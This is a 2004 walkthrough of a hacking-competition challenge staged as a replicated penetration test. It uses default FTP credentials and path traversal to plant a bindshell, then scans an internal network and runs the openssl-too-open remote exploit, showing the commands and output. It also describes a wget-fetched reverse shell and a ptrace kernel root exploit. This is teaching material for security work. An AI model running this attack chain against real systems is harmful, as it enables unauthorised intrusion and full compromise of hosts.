This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).
This is actually a replication (lab conditions) of one of my latest penetration tests, which I enjoyed thoroughly.
I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.
1. A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 are open, suggests this machine is not firewalled, and is connected directly to the internet.
2. It looks like a Windows 2000 box (due to the versions of the WEB and SMTP server). There also seems to be a 3rd party ftp server – Flash FTP server 2.1.
3. I seem to remember seeing a recent vulnerability in flash ftp server, and a quick google search affirms my suspicions.
4. With a bit of trial and error, I find that the ftp username and password is ftp / ftp.
5. I log on to the ftp, and check where the ftp home directory lies. I attempt to upload a bindshell (srvcmd.exe) to the default location of the IIS “scripts” directory (using file traversal) , in order to be able to execute the bindshell.
6. Once that’s done, I execute srvcmd.exe by pointing my web browser to it.
7. Once executed, the bindshell opens a cmd shell at port 2323. What’s this? A dual homed machine?
8. We now have IUSR privileges on the Windows box, and the ability to ftp files to the machine using username ftp / ftp.
9. We upload out favorite toolkit to the ftp server, including a port scanner, and scan the internal network (192.168.0.0/24).
scan the internal network (192.168.0.0/24).
C:internetftpserver>sl -bhtz 192.168.0.1-254
sl -bhtz 192.168.0.1-254Scan of 254 IPs started at Thu Jan 15 19:28:45 2004
------------------------------------------------------------------------------
192.168.0.1
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456
TCP 25:
[220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]
TCP 80:
[HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Fri, 16 Jan 2004 03:28:55 GMT Location: localstart.asp Connection: Keep-Alive Content-Length: 121C]
------------------------------------------------------------------------------
192.168.0.111
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 80 111 389 443 3306 10000 32768
UDP ports: 68 69 111 123 135 137 138 191 192 256 260 407 445 500 514 520 1009 10 24 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 1091 1352 1645 1646 1812 18 13 1900 1978 2002 2049 2140 2161 2301 2493 2631 2967 3179 3327 3456 4045 4156 42 96 4469 4802 5631 11487 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32778 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 43981
TCP 21:
[Compiled-in modules: mod_core.c mod_auth.c mod_xfer.c mod_site.c mod_ls.c mod_unixpw.c mod_log.c mod_linuxprivs.c mod_ratio.c mod_readme.c mod_pam.c mod_quot]
TCP 22:[SSH-1.99-OpenSSH_3.1p1]
TCP 80:[HTTP/1.1 200 OK Date: Thu, 15 Jan 2004 19:55:17 GMT Server:Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2]
TCP 443:
[HTTP/1.1 400 Bad Request Date: Thu, 15 Jan 2004 19:55:20 GMT Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c]
TCP 3306:
[D j Host '192.168.0.1' is not allowed to connect to this MySQL server]
TCP 10000:
[HTTP/1.0 400 Bad Request]
------------------------------------------------------------------------------
192.168.0.201
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 80 139 389
UDP ports: 135 137
TCP 80:
[HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 15 Jan 2004 14:55:18 GMT Connection: Keep-Alive Content-Length: 1270 Content-Type: text/html Set-Cookie:]
------------------------------------------------------------------------------
192.168.0.202
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 110 389
UDP ports:
TCP 21:
[220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]
TCP 110:[+OK POP3 box82 V1999 server ready -ERR Null command -ERR Null command]
------------------------------------------------------------------------------
192.168.0.203
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 23 389
UDP ports:
------------------------------------------------------------------------------
192.168.0.204
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 22 389
UDP ports:
TCP 22:
[SSH-1.5-2.40]
------------------------------------------------------------------------------
192.168.0.205
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 15 389UDP ports:
------------------------------------------------------------------------------
Scan finished at Thu Jan 15 19:29:25 2004ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs
C:internetftpserver>
10. Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual. I was running HoneyD so simulate a larger network. Identifying the real linux box (192.168.0.111 – Running mandrake 8.2) took a long time, so I’ll just cut the story short J.
11. I identify a quickly exploitable service on the mandrake machine (openssl), and upload a cygwin compiled version of the exploit (including dll’s) into the ftp directory. I execute the exploit, and get a shell on the internal mandrake box.
C:internetftpserver>dir
dir
Volume in drive C has no label.
Volume Serial Number is 20AA-0A2D
Directory of C:internetftpserver
01/15/2004 07:32p <DIR> .
01/15/2004 07:32p <DIR> ..
01/15/2004 07:32p 705,042 cygcrypto-0.9.7.dll
01/15/2004 07:32p 666,528 cygwin1.dll
01/14/2004 07:16p <DIR> Logs
01/15/2004 04:48p 59,392 nc.exe
01/15/2004 07:32p 122,368 openssl-too-open.exe
01/15/2004 06:40p 20,480 sl.exe
01/14/2004 11:01p 32,768 srvcmd.exe
6 File(s) 1,606,578 bytes
3 Dir(s) 2,579,120,128 bytes free
C:internetftpserver>openssl-too-open.exe -a 0x15 -v 192.168.0.111
openssl-too-open.exe -a 0x15 -v 192.168.0.111
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x811c038
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x811c038
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x811c038
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x811c038 start_addr: 0x811bf78 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;←[K
Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root vc/1 - 2:31pm 7:23 0.41s 0.36s -bash
bash-2.05$
12. The shell I get is a bit shifty, and echo’s all my commands twice. I decide to upload a reverse bindshell onto the mandrake box, and make it connect back to my attacking machine. I do this by using wget, and retrieving the rbs.c file from www.secureit.co.il.
13. Once that’s done, I compile and execute the reverse bind shell, while netcat is listening on port 4000 on the attacking machine. This gives me a cleaner shell, with “apache” user privileges.
14. Vaguely remembering the output of the uname command (Linux box82 2.4.18-6mdk) I decide to attempt a privilege escalation attack using the Linux kernel ptrace/kmod local root exploit, which should work under several 2.2.x and 2.4.x kernels.
15. I download (wget, again) compile and execute the exploit, hoping for the best.
16. The exploit was successful, and we now have root privileges on the mandrake box. The .doc file was located in /root/C.doc.
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.